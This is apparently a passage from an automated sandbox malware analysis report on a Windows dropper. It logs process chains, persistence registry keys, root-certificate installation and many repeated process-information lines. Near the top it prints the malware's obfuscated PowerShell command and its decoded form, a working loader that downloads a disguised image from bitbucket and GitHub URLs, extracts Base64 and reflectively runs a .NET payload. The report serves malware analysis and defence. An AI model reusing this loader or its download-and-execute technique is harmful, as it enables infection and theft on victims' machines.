                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#CJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: sRMytgfRpJ.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF7D6FD1D28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068ADFD1 push es; ret 10_2_068ADFE6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068AC711 push es; ret 10_2_068AC720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068AD412 push es; ret 10_2_068AD420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068AE060 push es; ret 10_2_068AE070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068AECF2 push eax; ret 10_2_068AED01

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF7D6FD1684
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
